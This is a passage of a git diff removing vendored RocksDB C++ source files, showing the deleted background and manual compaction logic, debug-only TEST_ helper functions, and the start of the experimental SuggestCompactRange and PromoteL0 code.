-    if (!s.ok() && !s.IsShutdownInProgress()) {
-      // Wait a little bit before retrying background compaction in
-      // case this is an environmental problem and we do not want to
-      // chew up resources for failed compactions for the duration of
-      // the problem.
-      uint64_t error_cnt =
-          default_cf_internal_stats_->BumpAndGetBackgroundErrorCount();
-      bg_cv_.SignalAll();  // In case a waiter can proceed despite the error
-      mutex_.Unlock();
-      log_buffer.FlushBufferToLog();
-      ROCKS_LOG_ERROR(immutable_db_options_.info_log,
-                      "Waiting after background compaction error: %s, "
-                      "Accumulated background error counts: %" PRIu64,
-                      s.ToString().c_str(), error_cnt);
-      LogFlush(immutable_db_options_.info_log);
-      env_->SleepForMicroseconds(1000000);
-      mutex_.Lock();
-    }
-
-    ReleaseFileNumberFromPendingOutputs(pending_outputs_inserted_elem);
-
-    // If compaction failed, we want to delete all temporary files that we might
-    // have created (they might not be all recorded in job_context in case of a
-    // failure). Thus, we force full scan in FindObsoleteFiles()
-    FindObsoleteFiles(&job_context, !s.ok() && !s.IsShutdownInProgress());
-
-    // delete unnecessary files if any, this is done outside the mutex
-    if (job_context.HaveSomethingToDelete() || !log_buffer.IsEmpty()) {
-      mutex_.Unlock();
-      // Have to flush the info logs before bg_compaction_scheduled_--
-      // because if bg_flush_scheduled_ becomes 0 and the lock is
-      // released, the deconstructor of DB can kick in and destroy all the
-      // states of DB so info_log might not be available after that point.
-      // It also applies to access other states that DB owns.
-      log_buffer.FlushBufferToLog();
-      if (job_context.HaveSomethingToDelete()) {
-        PurgeObsoleteFiles(job_context);
-      }
-      job_context.Clean();
-      mutex_.Lock();
-    }
-
-    assert(num_running_compactions_ > 0);
-    num_running_compactions_--;
-    if (bg_thread_pri == Env::Priority::LOW) {
-      bg_compaction_scheduled_--;
-    } else {
-      assert(bg_thread_pri == Env::Priority::BOTTOM);
-      bg_bottom_compaction_scheduled_--;
-    }
-
-    versions_->GetColumnFamilySet()->FreeDeadColumnFamilies();
-
-    // See if there's more work to be done
-    MaybeScheduleFlushOrCompaction();
-    if (made_progress ||
-        (bg_compaction_scheduled_ == 0 &&
-         bg_bottom_compaction_scheduled_ == 0) ||
-        HasPendingManualCompaction()) {
-      // signal if
-      // * made_progress -- need to wakeup DelayWrite
-      // * bg_{bottom,}_compaction_scheduled_ == 0 -- need to wakeup ~DBImpl
-      // * HasPendingManualCompaction -- need to wakeup RunManualCompaction
-      // If none of this is true, there is no need to signal since nobody is
-      // waiting for it
-      bg_cv_.SignalAll();
-    }
-    // IMPORTANT: there should be no code after calling SignalAll. This call may
-    // signal the DB destructor that it's OK to proceed with destruction. In
-    // that case, all DB variables will be dealloacated and referencing them
-    // will cause trouble.
-  }
-}
-
-Status DBImpl::BackgroundCompaction(bool* made_progress,
-                                    JobContext* job_context,
-                                    LogBuffer* log_buffer,
-                                    PrepickedCompaction* prepicked_compaction) {
-  ManualCompactionState* manual_compaction =
-      prepicked_compaction == nullptr
-          ? nullptr
-          : prepicked_compaction->manual_compaction_state;
-  *made_progress = false;
-  mutex_.AssertHeld();
-  TEST_SYNC_POINT("DBImpl::BackgroundCompaction:Start");
-
-  bool is_manual = (manual_compaction != nullptr);
-  unique_ptr<Compaction> c;
-  if (prepicked_compaction != nullptr &&
-      prepicked_compaction->compaction != nullptr) {
-    c.reset(prepicked_compaction->compaction);
-  }
-  bool is_prepicked = is_manual || c;
-
-  // (manual_compaction->in_progress == false);
-  bool trivial_move_disallowed =
-      is_manual && manual_compaction->disallow_trivial_move;
-
-  CompactionJobStats compaction_job_stats;
-  Status status = bg_error_;
-  if (status.ok() && shutting_down_.load(std::memory_order_acquire)) {
-    status = Status::ShutdownInProgress();
-  }
-
-  if (!status.ok()) {
-    if (is_manual) {
-      manual_compaction->status = status;
-      manual_compaction->done = true;
-      manual_compaction->in_progress = false;
-      manual_compaction = nullptr;
-    }
-    return status;
-  }
-
-  if (is_manual) {
-    // another thread cannot pick up the same work
-    manual_compaction->in_progress = true;
-  }
-
-  // InternalKey manual_end_storage;
-  // InternalKey* manual_end = &manual_end_storage;
-  if (is_manual) {
-    ManualCompactionState* m = manual_compaction;
-    assert(m->in_progress);
-    if (!c) {
-      m->done = true;
-      m->manual_end = nullptr;
-      ROCKS_LOG_BUFFER(log_buffer,
-                       "[%s] Manual compaction from level-%d from %s .. "
-                       "%s; nothing to do\n",
-                       m->cfd->GetName().c_str(), m->input_level,
-                       (m->begin ? m->begin->DebugString().c_str() : "(begin)"),
-                       (m->end ? m->end->DebugString().c_str() : "(end)"));
-    } else {
-      ROCKS_LOG_BUFFER(
-          log_buffer,
-          "[%s] Manual compaction from level-%d to level-%d from %s .. "
-          "%s; will stop at %s\n",
-          m->cfd->GetName().c_str(), m->input_level, c->output_level(),
-          (m->begin ? m->begin->DebugString().c_str() : "(begin)"),
-          (m->end ? m->end->DebugString().c_str() : "(end)"),
-          ((m->done || m->manual_end == nullptr)
-               ? "(end)"
-               : m->manual_end->DebugString().c_str()));
-    }
-  } else if (!is_prepicked && !compaction_queue_.empty()) {
-    if (HaveManualCompaction(compaction_queue_.front())) {
-      // Can't compact right now, but try again later
-      TEST_SYNC_POINT("DBImpl::BackgroundCompaction()::Conflict");
-
-      // Stay in the compaction queue.
-      unscheduled_compactions_++;
-
-      return Status::OK();
-    }
-
-    // cfd is referenced here
-    auto cfd = PopFirstFromCompactionQueue();
-    // We unreference here because the following code will take a Ref() on
-    // this cfd if it is going to use it (Compaction class holds a
-    // reference).
-    // This will all happen under a mutex so we don't have to be afraid of
-    // somebody else deleting it.
-    if (cfd->Unref()) {
-      delete cfd;
-      // This was the last reference of the column family, so no need to
-      // compact.
-      return Status::OK();
-    }
-
-    // Pick up latest mutable CF Options and use it throughout the
-    // compaction job
-    // Compaction makes a copy of the latest MutableCFOptions. It should be used
-    // throughout the compaction procedure to make sure consistency. It will
-    // eventually be installed into SuperVersion
-    auto* mutable_cf_options = cfd->GetLatestMutableCFOptions();
-    if (!mutable_cf_options->disable_auto_compactions && !cfd->IsDropped()) {
-      // NOTE: try to avoid unnecessary copy of MutableCFOptions if
-      // compaction is not necessary. Need to make sure mutex is held
-      // until we make a copy in the following code
-      TEST_SYNC_POINT("DBImpl::BackgroundCompaction():BeforePickCompaction");
-      c.reset(cfd->PickCompaction(*mutable_cf_options, log_buffer));
-      TEST_SYNC_POINT("DBImpl::BackgroundCompaction():AfterPickCompaction");
-      if (c != nullptr) {
-        // update statistics
-        MeasureTime(stats_, NUM_FILES_IN_SINGLE_COMPACTION,
-                    c->inputs(0)->size());
-        // There are three things that can change compaction score:
-        // 1) When flush or compaction finish. This case is covered by
-        // InstallSuperVersionAndScheduleWork
-        // 2) When MutableCFOptions changes. This case is also covered by
-        // InstallSuperVersionAndScheduleWork, because this is when the new
-        // options take effect.
-        // 3) When we Pick a new compaction, we "remove" those files being
-        // compacted from the calculation, which then influences compaction
-        // score. Here we check if we need the new compaction even without the
-        // files that are currently being compacted. If we need another
-        // compaction, we might be able to execute it in parallel, so we add it
-        // to the queue and schedule a new thread.
-        if (cfd->NeedsCompaction()) {
-          // Yes, we need more compactions!
-          AddToCompactionQueue(cfd);
-          ++unscheduled_compactions_;
-          MaybeScheduleFlushOrCompaction();
-        }
-      }
-    }
-  }
-
-  if (!c) {
-    // Nothing to do
-    ROCKS_LOG_BUFFER(log_buffer, "Compaction nothing to do");
-  } else if (c->deletion_compaction()) {
-    // TODO(icanadi) Do we want to honor snapshots here? i.e. not delete old
-    // file if there is alive snapshot pointing to it
-    assert(c->num_input_files(1) == 0);
-    assert(c->level() == 0);
-    assert(c->column_family_data()->ioptions()->compaction_style ==
-           kCompactionStyleFIFO);
-
-    compaction_job_stats.num_input_files = c->num_input_files(0);
-
-    for (const auto& f : *c->inputs(0)) {
-      c->edit()->DeleteFile(c->level(), f->fd.GetNumber());
-    }
-    status = versions_->LogAndApply(c->column_family_data(),
-                                    *c->mutable_cf_options(), c->edit(),
-                                    &mutex_, directories_.GetDbDir());
-    InstallSuperVersionAndScheduleWorkWrapper(
-        c->column_family_data(), job_context, *c->mutable_cf_options());
-    ROCKS_LOG_BUFFER(log_buffer, "[%s] Deleted %d files\n",
-                     c->column_family_data()->GetName().c_str(),
-                     c->num_input_files(0));
-    *made_progress = true;
-  } else if (!trivial_move_disallowed && c->IsTrivialMove()) {
-    TEST_SYNC_POINT("DBImpl::BackgroundCompaction:TrivialMove");
-    // Instrument for event update
-    // TODO(yhchiang): add op details for showing trivial-move.
-    ThreadStatusUtil::SetColumnFamily(
-        c->column_family_data(), c->column_family_data()->ioptions()->env,
-        immutable_db_options_.enable_thread_tracking);
-    ThreadStatusUtil::SetThreadOperation(ThreadStatus::OP_COMPACTION);
-
-    compaction_job_stats.num_input_files = c->num_input_files(0);
-
-    // Move files to next level
-    int32_t moved_files = 0;
-    int64_t moved_bytes = 0;
-    for (unsigned int l = 0; l < c->num_input_levels(); l++) {
-      if (c->level(l) == c->output_level()) {
-        continue;
-      }
-      for (size_t i = 0; i < c->num_input_files(l); i++) {
-        FileMetaData* f = c->input(l, i);
-        c->edit()->DeleteFile(c->level(l), f->fd.GetNumber());
-        c->edit()->AddFile(c->output_level(), f->fd.GetNumber(),
-                           f->fd.GetPathId(), f->fd.GetFileSize(), f->smallest,
-                           f->largest, f->smallest_seqno, f->largest_seqno,
-                           f->marked_for_compaction);
-
-        ROCKS_LOG_BUFFER(log_buffer, "[%s] Moving #%" PRIu64
-                                     " to level-%d %" PRIu64 " bytes\n",
-                         c->column_family_data()->GetName().c_str(),
-                         f->fd.GetNumber(), c->output_level(),
-                         f->fd.GetFileSize());
-        ++moved_files;
-        moved_bytes += f->fd.GetFileSize();
-      }
-    }
-
-    status = versions_->LogAndApply(c->column_family_data(),
-                                    *c->mutable_cf_options(), c->edit(),
-                                    &mutex_, directories_.GetDbDir());
-    // Use latest MutableCFOptions
-    InstallSuperVersionAndScheduleWorkWrapper(
-        c->column_family_data(), job_context, *c->mutable_cf_options());
-
-    VersionStorageInfo::LevelSummaryStorage tmp;
-    c->column_family_data()->internal_stats()->IncBytesMoved(c->output_level(),
-                                                             moved_bytes);
-    {
-      event_logger_.LogToBuffer(log_buffer)
-          << "job" << job_context->job_id << "event"
-          << "trivial_move"
-          << "destination_level" << c->output_level() << "files" << moved_files
-          << "total_files_size" << moved_bytes;
-    }
-    ROCKS_LOG_BUFFER(
-        log_buffer,
-        "[%s] Moved #%d files to level-%d %" PRIu64 " bytes %s: %s\n",
-        c->column_family_data()->GetName().c_str(), moved_files,
-        c->output_level(), moved_bytes, status.ToString().c_str(),
-        c->column_family_data()->current()->storage_info()->LevelSummary(&tmp));
-    *made_progress = true;
-
-    // Clear Instrument
-    ThreadStatusUtil::ResetThreadStatus();
-  } else if (c->column_family_data()->ioptions()->compaction_style ==
-                 kCompactionStyleUniversal &&
-             !is_prepicked && c->output_level() > 0 &&
-             c->output_level() ==
-                 c->column_family_data()
-                     ->current()
-                     ->storage_info()
-                     ->MaxOutputLevel(
-                         immutable_db_options_.allow_ingest_behind) &&
-             env_->GetBackgroundThreads(Env::Priority::BOTTOM) > 0) {
-    // Forward universal compactions involving last level to the bottom pool
-    // if it exists, such that long-running compactions can't block short-
-    // lived ones, like L0->L0s.
-    TEST_SYNC_POINT("DBImpl::BackgroundCompaction:ForwardToBottomPriPool");
-    CompactionArg* ca = new CompactionArg;
-    ca->db = this;
-    ca->prepicked_compaction = new PrepickedCompaction;
-    ca->prepicked_compaction->compaction = c.release();
-    ca->prepicked_compaction->manual_compaction_state = nullptr;
-    ++bg_bottom_compaction_scheduled_;
-    env_->Schedule(&DBImpl::BGWorkBottomCompaction, ca, Env::Priority::BOTTOM,
-                   this, &DBImpl::UnscheduleCallback);
-  } else {
-    int output_level  __attribute__((unused)) = c->output_level();
-    TEST_SYNC_POINT_CALLBACK("DBImpl::BackgroundCompaction:NonTrivial",
-                             &output_level);
-
-    SequenceNumber earliest_write_conflict_snapshot;
-    std::vector<SequenceNumber> snapshot_seqs =
-        snapshots_.GetAll(&earliest_write_conflict_snapshot);
-
-    assert(is_snapshot_supported_ || snapshots_.empty());
-    CompactionJob compaction_job(
-        job_context->job_id, c.get(), immutable_db_options_, env_options_,
-        versions_.get(), &shutting_down_, log_buffer, directories_.GetDbDir(),
-        directories_.GetDataDir(c->output_path_id()), stats_, &mutex_,
-        &bg_error_, snapshot_seqs, earliest_write_conflict_snapshot,
-        table_cache_, &event_logger_,
-        c->mutable_cf_options()->paranoid_file_checks,
-        c->mutable_cf_options()->report_bg_io_stats, dbname_,
-        &compaction_job_stats);
-    compaction_job.Prepare();
-
-    mutex_.Unlock();
-    compaction_job.Run();
-    TEST_SYNC_POINT("DBImpl::BackgroundCompaction:NonTrivial:AfterRun");
-    mutex_.Lock();
-
-    status = compaction_job.Install(*c->mutable_cf_options());
-    if (status.ok()) {
-      InstallSuperVersionAndScheduleWorkWrapper(
-          c->column_family_data(), job_context, *c->mutable_cf_options());
-    }
-    *made_progress = true;
-  }
-  if (c != nullptr) {
-    c->ReleaseCompactionFiles(status);
-    *made_progress = true;
-    NotifyOnCompactionCompleted(
-        c->column_family_data(), c.get(), status,
-        compaction_job_stats, job_context->job_id);
-  }
-  // this will unref its input_version and column_family_data
-  c.reset();
-
-  if (status.ok()) {
-    // Done
-  } else if (status.IsShutdownInProgress()) {
-    // Ignore compaction errors found during shutting down
-  } else {
-    ROCKS_LOG_WARN(immutable_db_options_.info_log, "Compaction error: %s",
-                   status.ToString().c_str());
-    if (immutable_db_options_.paranoid_checks && bg_error_.ok()) {
-      Status new_bg_error = status;
-      // may temporarily unlock and lock the mutex.
-      EventHelpers::NotifyOnBackgroundError(immutable_db_options_.listeners,
-                                            BackgroundErrorReason::kCompaction,
-                                            &new_bg_error, &mutex_);
-      if (!new_bg_error.ok()) {
-        bg_error_ = new_bg_error;
-      }
-    }
-  }
-
-  if (is_manual) {
-    ManualCompactionState* m = manual_compaction;
-    if (!status.ok()) {
-      m->status = status;
-      m->done = true;
-    }
-    // For universal compaction:
-    //   Because universal compaction always happens at level 0, so one
-    //   compaction will pick up all overlapped files. No files will be
-    //   filtered out due to size limit and left for a successive compaction.
-    //   So we can safely conclude the current compaction.
-    //
-    //   Also note that, if we don't stop here, then the current compaction
-    //   writes a new file back to level 0, which will be used in successive
-    //   compaction. Hence the manual compaction will never finish.
-    //
-    // Stop the compaction if manual_end points to nullptr -- this means
-    // that we compacted the whole range. manual_end should always point
-    // to nullptr in case of universal compaction
-    if (m->manual_end == nullptr) {
-      m->done = true;
-    }
-    if (!m->done) {
-      // We only compacted part of the requested range.  Update *m
-      // to the range that is left to be compacted.
-      // Universal and FIFO compactions should always compact the whole range
-      assert(m->cfd->ioptions()->compaction_style !=
-                 kCompactionStyleUniversal ||
-             m->cfd->ioptions()->num_levels > 1);
-      assert(m->cfd->ioptions()->compaction_style != kCompactionStyleFIFO);
-      m->tmp_storage = *m->manual_end;
-      m->begin = &m->tmp_storage;
-      m->incomplete = true;
-    }
-    m->in_progress = false; // not being processed anymore
-  }
-  TEST_SYNC_POINT("DBImpl::BackgroundCompaction:Finish");
-  return status;
-}
-
-bool DBImpl::HasPendingManualCompaction() {
-  return (!manual_compaction_dequeue_.empty());
-}
-
-void DBImpl::AddManualCompaction(DBImpl::ManualCompactionState* m) {
-  manual_compaction_dequeue_.push_back(m);
-}
-
-void DBImpl::RemoveManualCompaction(DBImpl::ManualCompactionState* m) {
-  // Remove from queue
-  std::deque<ManualCompactionState*>::iterator it =
-      manual_compaction_dequeue_.begin();
-  while (it != manual_compaction_dequeue_.end()) {
-    if (m == (*it)) {
-      it = manual_compaction_dequeue_.erase(it);
-      return;
-    }
-    it++;
-  }
-  assert(false);
-  return;
-}
-
-bool DBImpl::ShouldntRunManualCompaction(ManualCompactionState* m) {
-  if (num_running_ingest_file_ > 0) {
-    // We need to wait for other IngestExternalFile() calls to finish
-    // before running a manual compaction.
-    return true;
-  }
-  if (m->exclusive) {
-    return (bg_bottom_compaction_scheduled_ > 0 ||
-            bg_compaction_scheduled_ > 0);
-  }
-  std::deque<ManualCompactionState*>::iterator it =
-      manual_compaction_dequeue_.begin();
-  bool seen = false;
-  while (it != manual_compaction_dequeue_.end()) {
-    if (m == (*it)) {
-      it++;
-      seen = true;
-      continue;
-    } else if (MCOverlap(m, (*it)) && (!seen && !(*it)->in_progress)) {
-      // Consider the other manual compaction *it, conflicts if:
-      // overlaps with m
-      // and (*it) is ahead in the queue and is not yet in progress
-      return true;
-    }
-    it++;
-  }
-  return false;
-}
-
-bool DBImpl::HaveManualCompaction(ColumnFamilyData* cfd) {
-  // Remove from priority queue
-  std::deque<ManualCompactionState*>::iterator it =
-      manual_compaction_dequeue_.begin();
-  while (it != manual_compaction_dequeue_.end()) {
-    if ((*it)->exclusive) {
-      return true;
-    }
-    if ((cfd == (*it)->cfd) && (!((*it)->in_progress || (*it)->done))) {
-      // Allow automatic compaction if manual compaction is
-      // in progress
-      return true;
-    }
-    it++;
-  }
-  return false;
-}
-
-bool DBImpl::HasExclusiveManualCompaction() {
-  // Remove from priority queue
-  std::deque<ManualCompactionState*>::iterator it =
-      manual_compaction_dequeue_.begin();
-  while (it != manual_compaction_dequeue_.end()) {
-    if ((*it)->exclusive) {
-      return true;
-    }
-    it++;
-  }
-  return false;
-}
-
-bool DBImpl::MCOverlap(ManualCompactionState* m, ManualCompactionState* m1) {
-  if ((m->exclusive) || (m1->exclusive)) {
-    return true;
-  }
-  if (m->cfd != m1->cfd) {
-    return false;
-  }
-  return true;
-}
-
-// JobContext gets created and destructed outside of the lock --
-// we
-// use this convinently to:
-// * malloc one SuperVersion() outside of the lock -- new_superversion
-// * delete SuperVersion()s outside of the lock -- superversions_to_free
-//
-// However, if InstallSuperVersionAndScheduleWork() gets called twice with the
-// same job_context, we can't reuse the SuperVersion() that got
-// malloced because
-// first call already used it. In that rare case, we take a hit and create a
-// new SuperVersion() inside of the mutex. We do similar thing
-// for superversion_to_free
-void DBImpl::InstallSuperVersionAndScheduleWorkWrapper(
-    ColumnFamilyData* cfd, JobContext* job_context,
-    const MutableCFOptions& mutable_cf_options) {
-  mutex_.AssertHeld();
-  SuperVersion* old_superversion = InstallSuperVersionAndScheduleWork(
-      cfd, job_context->new_superversion, mutable_cf_options);
-  job_context->new_superversion = nullptr;
-  job_context->superversions_to_free.push_back(old_superversion);
-}
-
-SuperVersion* DBImpl::InstallSuperVersionAndScheduleWork(
-    ColumnFamilyData* cfd, SuperVersion* new_sv,
-    const MutableCFOptions& mutable_cf_options) {
-  mutex_.AssertHeld();
-
-  // Update max_total_in_memory_state_
-  size_t old_memtable_size = 0;
-  auto* old_sv = cfd->GetSuperVersion();
-  if (old_sv) {
-    old_memtable_size = old_sv->mutable_cf_options.write_buffer_size *
-                        old_sv->mutable_cf_options.max_write_buffer_number;
-  }
-
-  auto* old = cfd->InstallSuperVersion(
-      new_sv ? new_sv : new SuperVersion(), &mutex_, mutable_cf_options);
-
-  // Whenever we install new SuperVersion, we might need to issue new flushes or
-  // compactions.
-  SchedulePendingFlush(cfd);
-  SchedulePendingCompaction(cfd);
-  MaybeScheduleFlushOrCompaction();
-
-  // Update max_total_in_memory_state_
-  max_total_in_memory_state_ =
-      max_total_in_memory_state_ - old_memtable_size +
-      mutable_cf_options.write_buffer_size *
-      mutable_cf_options.max_write_buffer_number;
-  return old;
-}
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/db_impl_debug.cc b/thirdparty/rocksdb/db/db_impl_debug.cc
deleted file mode 100644
index a4b3780..0000000
--- a/thirdparty/rocksdb/db/db_impl_debug.cc
+++ /dev/null
@@ -1,209 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef NDEBUG
-
-#include "db/db_impl.h"
-#include "monitoring/thread_status_updater.h"
-
-namespace rocksdb {
-
-uint64_t DBImpl::TEST_GetLevel0TotalSize() {
-  InstrumentedMutexLock l(&mutex_);
-  return default_cf_handle_->cfd()->current()->storage_info()->NumLevelBytes(0);
-}
-
-void DBImpl::TEST_HandleWALFull() {
-  WriteContext write_context;
-  InstrumentedMutexLock l(&mutex_);
-  HandleWALFull(&write_context);
-}
-
-int64_t DBImpl::TEST_MaxNextLevelOverlappingBytes(
-    ColumnFamilyHandle* column_family) {
-  ColumnFamilyData* cfd;
-  if (column_family == nullptr) {
-    cfd = default_cf_handle_->cfd();
-  } else {
-    auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-    cfd = cfh->cfd();
-  }
-  InstrumentedMutexLock l(&mutex_);
-  return cfd->current()->storage_info()->MaxNextLevelOverlappingBytes();
-}
-
-void DBImpl::TEST_GetFilesMetaData(
-    ColumnFamilyHandle* column_family,
-    std::vector<std::vector<FileMetaData>>* metadata) {
-  auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-  auto cfd = cfh->cfd();
-  InstrumentedMutexLock l(&mutex_);
-  metadata->resize(NumberLevels());
-  for (int level = 0; level < NumberLevels(); level++) {
-    const std::vector<FileMetaData*>& files =
-        cfd->current()->storage_info()->LevelFiles(level);
-
-    (*metadata)[level].clear();
-    for (const auto& f : files) {
-      (*metadata)[level].push_back(*f);
-    }
-  }
-}
-
-uint64_t DBImpl::TEST_Current_Manifest_FileNo() {
-  return versions_->manifest_file_number();
-}
-
-Status DBImpl::TEST_CompactRange(int level, const Slice* begin,
-                                 const Slice* end,
-                                 ColumnFamilyHandle* column_family,
-                                 bool disallow_trivial_move) {
-  ColumnFamilyData* cfd;
-  if (column_family == nullptr) {
-    cfd = default_cf_handle_->cfd();
-  } else {
-    auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-    cfd = cfh->cfd();
-  }
-  int output_level =
-      (cfd->ioptions()->compaction_style == kCompactionStyleUniversal ||
-       cfd->ioptions()->compaction_style == kCompactionStyleFIFO)
-          ? level
-          : level + 1;
-  return RunManualCompaction(cfd, level, output_level, 0, begin, end, true,
-                             disallow_trivial_move);
-}
-
-Status DBImpl::TEST_SwitchMemtable(ColumnFamilyData* cfd) {
-  WriteContext write_context;
-  InstrumentedMutexLock l(&mutex_);
-  if (cfd == nullptr) {
-    cfd = default_cf_handle_->cfd();
-  }
-  return SwitchMemtable(cfd, &write_context);
-}
-
-Status DBImpl::TEST_FlushMemTable(bool wait, ColumnFamilyHandle* cfh) {
-  FlushOptions fo;
-  fo.wait = wait;
-  ColumnFamilyData* cfd;
-  if (cfh == nullptr) {
-    cfd = default_cf_handle_->cfd();
-  } else {
-    auto cfhi = reinterpret_cast<ColumnFamilyHandleImpl*>(cfh);
-    cfd = cfhi->cfd();
-  }
-  return FlushMemTable(cfd, fo);
-}
-
-Status DBImpl::TEST_WaitForFlushMemTable(ColumnFamilyHandle* column_family) {
-  ColumnFamilyData* cfd;
-  if (column_family == nullptr) {
-    cfd = default_cf_handle_->cfd();
-  } else {
-    auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-    cfd = cfh->cfd();
-  }
-  return WaitForFlushMemTable(cfd);
-}
-
-Status DBImpl::TEST_WaitForCompact() {
-  // Wait until the compaction completes
-
-  // TODO: a bug here. This function actually does not necessarily
-  // wait for compact. It actually waits for scheduled compaction
-  // OR flush to finish.
-
-  InstrumentedMutexLock l(&mutex_);
-  while ((bg_bottom_compaction_scheduled_ || bg_compaction_scheduled_ ||
-          bg_flush_scheduled_) &&
-         bg_error_.ok()) {
-    bg_cv_.Wait();
-  }
-  return bg_error_;
-}
-
-void DBImpl::TEST_LockMutex() {
-  mutex_.Lock();
-}
-
-void DBImpl::TEST_UnlockMutex() {
-  mutex_.Unlock();
-}
-
-void* DBImpl::TEST_BeginWrite() {
-  auto w = new WriteThread::Writer();
-  write_thread_.EnterUnbatched(w, &mutex_);
-  return reinterpret_cast<void*>(w);
-}
-
-void DBImpl::TEST_EndWrite(void* w) {
-  auto writer = reinterpret_cast<WriteThread::Writer*>(w);
-  write_thread_.ExitUnbatched(writer);
-  delete writer;
-}
-
-size_t DBImpl::TEST_LogsToFreeSize() {
-  InstrumentedMutexLock l(&mutex_);
-  return logs_to_free_.size();
-}
-
-uint64_t DBImpl::TEST_LogfileNumber() {
-  InstrumentedMutexLock l(&mutex_);
-  return logfile_number_;
-}
-
-Status DBImpl::TEST_GetAllImmutableCFOptions(
-    std::unordered_map<std::string, const ImmutableCFOptions*>* iopts_map) {
-  std::vector<std::string> cf_names;
-  std::vector<const ImmutableCFOptions*> iopts;
-  {
-    InstrumentedMutexLock l(&mutex_);
-    for (auto cfd : *versions_->GetColumnFamilySet()) {
-      cf_names.push_back(cfd->GetName());
-      iopts.push_back(cfd->ioptions());
-    }
-  }
-  iopts_map->clear();
-  for (size_t i = 0; i < cf_names.size(); ++i) {
-    iopts_map->insert({cf_names[i], iopts[i]});
-  }
-
-  return Status::OK();
-}
-
-uint64_t DBImpl::TEST_FindMinLogContainingOutstandingPrep() {
-  return FindMinLogContainingOutstandingPrep();
-}
-
-uint64_t DBImpl::TEST_FindMinPrepLogReferencedByMemTable() {
-  return FindMinPrepLogReferencedByMemTable();
-}
-
-Status DBImpl::TEST_GetLatestMutableCFOptions(
-    ColumnFamilyHandle* column_family, MutableCFOptions* mutable_cf_options) {
-  InstrumentedMutexLock l(&mutex_);
-
-  auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-  *mutable_cf_options = *cfh->cfd()->GetLatestMutableCFOptions();
-  return Status::OK();
-}
-
-int DBImpl::TEST_BGCompactionsAllowed() const {
-  InstrumentedMutexLock l(&mutex_);
-  return GetBGJobLimits().max_compactions;
-}
-
-int DBImpl::TEST_BGFlushesAllowed() const {
-  InstrumentedMutexLock l(&mutex_);
-  return GetBGJobLimits().max_flushes;
-}
-
-}  // namespace rocksdb
-#endif  // NDEBUG
diff --git a/thirdparty/rocksdb/db/db_impl_experimental.cc b/thirdparty/rocksdb/db/db_impl_experimental.cc
deleted file mode 100644
index 0d01075..0000000
--- a/thirdparty/rocksdb/db/db_impl_experimental.cc
+++ /dev/null
@@ -1,152 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/db_impl.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include <vector>
-
-#include "db/column_family.h"
-#include "db/job_context.h"
-#include "db/version_set.h"
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-
-#ifndef ROCKSDB_LITE
-Status DBImpl::SuggestCompactRange(ColumnFamilyHandle* column_family,
-                                   const Slice* begin, const Slice* end) {
-  auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-  auto cfd = cfh->cfd();
-  InternalKey start_key, end_key;
-  if (begin != nullptr) {
-    start_key.SetMaxPossibleForUserKey(*begin);
-  }
-  if (end != nullptr) {
-    end_key.SetMinPossibleForUserKey(*end);
-  }
-  {
-    InstrumentedMutexLock l(&mutex_);
-    auto vstorage = cfd->current()->storage_info();
-    for (int level = 0; level < vstorage->num_non_empty_levels() - 1; ++level) {
-      std::vector<FileMetaData*> inputs;
-      vstorage->GetOverlappingInputs(
-          level, begin == nullptr ? nullptr : &start_key,
-          end == nullptr ? nullptr : &end_key, &inputs);
-      for (auto f : inputs) {
-        f->marked_for_compaction = true;
-      }
-    }
-    // Since we have some more files to compact, we should also recompute
-    // compaction score
-    vstorage->ComputeCompactionScore(*cfd->ioptions(),
-                                     *cfd->GetLatestMutableCFOptions());
-    SchedulePendingCompaction(cfd);
-    MaybeScheduleFlushOrCompaction();
-  }
-  return Status::OK();
-}
-
-Status DBImpl::PromoteL0(ColumnFamilyHandle* column_family, int target_level) {
-  assert(column_family);
-
-  if (target_level < 1) {
-    ROCKS_LOG_INFO(immutable_db_options_.info_log,
-                   "PromoteL0 FAILED. Invalid target level %d\n", target_level);
-    return Status::InvalidArgument("Invalid target level");
-  }
-
-  Status status;
-  VersionEdit edit;
-  JobContext job_context(next_job_id_.fetch_add(1), true);
-  {
-    InstrumentedMutexLock l(&mutex_);
-    auto* cfd = static_cast<ColumnFamilyHandleImpl*>(column_family)->cfd();
-    const auto* vstorage = cfd->current()->storage_info();
-
-    if (target_level >= vstorage->num_levels()) {
-      ROCKS_LOG_INFO(immutable_db_options_.info_log,
-                     "PromoteL0 FAILED. Target level %d does not exist\n",
-                     target_level);
-      job_context.Clean();
-      return Status::InvalidArgument("Target level does not exist");
-    }
-
-    // Sort L0 files by range.
-    const InternalKeyComparator* icmp = &cfd->internal_comparator();
-    auto l0_files = vstorage->LevelFiles(0);
-    std::sort(l0_files.begin(), l0_files.end(),
-              [icmp](FileMetaData* f1, FileMetaData* f2) {
-                return icmp->Compare(f1->largest, f2->largest) < 0;
-              });
-
-    // Check that no L0 file is being compacted and that they have
-    // non-overlapping ranges.
-    for (size_t i = 0; i < l0_files.size(); ++i) {
-      auto f = l0_files[i];
-      if (f->being_compacted) {
-        ROCKS_LOG_INFO(immutable_db_options_.info_log,
-                       "PromoteL0 FAILED. File %" PRIu64 " being compacted\n",
-                       f->fd.GetNumber());
